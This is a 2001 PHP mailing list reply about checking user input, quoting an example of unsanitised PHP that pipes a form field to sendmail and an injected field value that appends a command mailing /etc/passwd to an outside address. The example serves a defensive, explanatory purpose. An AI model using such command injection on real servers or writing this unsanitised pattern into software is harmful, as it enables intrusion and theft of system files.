At 06:03 PM 12/20/2001 -0800, Philip Hallstrom wrote: > > I've done something similar in the past just for kicks, and I got the same > > result you did (i.e. an error). I believe this is because mysql_query() > > expects ONE query at a time and will break if you send two or more. I > > could be completely and totally wrong about that, though (someone please > > correct me if I am)... > >Maybe this one failed, but it's always a good idea to check user input. >Let's say you're emailing a form and you don't use the mail() function, >but make a call directly to sendmail... and you're sloppy... so you do >this: [...]
True. But we were speaking specifically about MySQL. When you start toying with external programs and exec() and so forth then you've opened up a whole other can of worms security-wise... >$fp = fopen("|/usr/bin/sendmail $sendto"); >#write stuff to pipe to send email... > >Now... what if when I filled out the form I set $sendto equal to this: > >[EMAIL PROTECTED]; /usr/bin/mail [EMAIL PROTECTED] < /etc/passwd A definite possibility, but it does depend on the hacker in question knowing exactly how your script is written... -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]